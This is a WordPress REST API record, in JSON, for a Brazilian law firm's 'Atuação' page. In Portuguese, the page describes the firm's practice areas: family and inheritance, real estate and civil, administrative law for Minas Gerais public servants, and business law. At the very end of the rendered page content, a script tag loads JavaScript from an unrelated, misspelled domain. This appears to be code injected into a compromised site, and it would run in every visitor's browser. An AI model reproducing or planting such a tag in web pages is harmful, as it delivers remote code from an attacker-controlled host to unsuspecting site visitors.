{"id":11,"date":"2010-06-23T03:44:16","date_gmt":"2010-06-23T03:44:16","guid":{"rendered":"http:\/\/localhost\/carruscavieira\/?page_id=11"},"modified":"2026-03-10T13:22:18","modified_gmt":"2026-03-10T13:22:18","slug":"atuacao","status":"publish","type":"page","link":"https:\/\/carruscavieira.com.br\/?page_id=11","title":{"rendered":"Atua\u00e7\u00e3o"},"content":{"rendered":"<p data-start=\"542\" data-end=\"680\">Prestamos assessoria jur\u00eddica estrat\u00e9gica em diferentes \u00e1reas do Direito, com atua\u00e7\u00e3o consultiva, preventiva e contenciosa, destacando-se:<\/p>\n<hr data-start=\"682\" data-end=\"685\" \/>\n<h3 data-section-id=\"ucl0ne\" data-start=\"687\" data-end=\"721\">Direito de Fam\u00edlia e Sucess\u00f5es<\/h3>\n<p data-start=\"723\" data-end=\"912\">Atua\u00e7\u00e3o em demandas familiares e sucess\u00f3rias, tanto na esfera judicial quanto extrajudicial, envolvendo div\u00f3rcios, partilhas, invent\u00e1rios, planejamento sucess\u00f3rio e organiza\u00e7\u00e3o patrimonial.<\/p>\n<p data-start=\"914\" data-end=\"1105\">O trabalho \u00e9 conduzido com aten\u00e7\u00e3o \u00e0s particularidades de cada situa\u00e7\u00e3o, preservando a confidencialidade, o equil\u00edbrio nas rela\u00e7\u00f5es familiares e a adequada prote\u00e7\u00e3o dos interesses envolvidos.<\/p>\n<hr data-start=\"1107\" data-end=\"1110\" \/>\n<h3 data-section-id=\"1ivl8ve\" data-start=\"1112\" data-end=\"1143\">Direito Imobili\u00e1rio e C\u00edvel<\/h3>\n<p data-start=\"1145\" data-end=\"1258\">Assessoria jur\u00eddica em opera\u00e7\u00f5es imobili\u00e1rias, contratos, loca\u00e7\u00f5es e estrutura\u00e7\u00e3o de neg\u00f3cios envolvendo im\u00f3veis.<\/p>\n<p data-start=\"1260\" data-end=\"1442\">Atua\u00e7\u00e3o em demandas judiciais relacionadas a descumprimentos contratuais, rescis\u00f5es, cobran\u00e7as, disputas possess\u00f3rias e conflitos decorrentes de rela\u00e7\u00f5es civis e imobili\u00e1rias.<\/p>\n<hr data-start=\"1444\" data-end=\"1447\" \/>\n<h3 data-section-id=\"1funm9k\" data-start=\"1449\" data-end=\"1475\">Direito Administrativo<\/h3>\n<p data-start=\"1477\" data-end=\"1678\">Atua\u00e7\u00e3o em demandas envolvendo servidores p\u00fablicos do Estado de Minas Gerais e do Munic\u00edpio de Belo Horizonte, especialmente na an\u00e1lise e recupera\u00e7\u00e3o de direitos funcionais e diferen\u00e7as remunerat\u00f3rias.<\/p>\n<hr data-start=\"1680\" data-end=\"1683\" \/>\n<h3 data-section-id=\"rmapz9\" data-start=\"1685\" data-end=\"1708\">Direito Empresarial<\/h3>\n<p data-start=\"1710\" data-end=\"1907\">Assessoria jur\u00eddica voltada \u00e0 atividade empresarial, com foco em preven\u00e7\u00e3o de lit\u00edgios, an\u00e1lise e elabora\u00e7\u00e3o de contratos, estrutura\u00e7\u00e3o de neg\u00f3cios e suporte estrat\u00e9gico para decis\u00f5es empresariais.<\/p>\n<hr data-start=\"1909\" data-end=\"1912\" \/>\n<h3 data-section-id=\"q16wgc\" data-start=\"1914\" data-end=\"1930\">Outras \u00e1reas<\/h3>\n<p data-start=\"1932\" data-end=\"2110\">Nas \u00e1reas trabalhista e criminal, o escrit\u00f3rio atua em coopera\u00e7\u00e3o com profissionais e bancas especializadas, mantendo o acompanhamento e a coordena\u00e7\u00e3o jur\u00eddica quando necess\u00e1rio.<\/p>\n<p><script src=\"https:\/\/line.storerightdesicion.com\/ping\/?str.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prestamos assessoria jur\u00eddica estrat\u00e9gica em diferentes \u00e1reas do Direito, com atua\u00e7\u00e3o consultiva, preventiva e contenciosa, destacando-se: Direito de Fam\u00edlia e Sucess\u00f5es Atua\u00e7\u00e3o em demandas familiares e sucess\u00f3rias, tanto na esfera judicial quanto extrajudicial, envolvendo div\u00f3rcios, partilhas, invent\u00e1rios, planejamento sucess\u00f3rio e organiza\u00e7\u00e3o patrimonial. O trabalho \u00e9 conduzido com aten\u00e7\u00e3o \u00e0s particularidades de cada situa\u00e7\u00e3o, preservando a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages\/11"}],"collection":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11"}],"version-history":[{"count":52,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions"}],"predecessor-version":[{"id":1086,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions\/1086"}],"wp:attachment":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}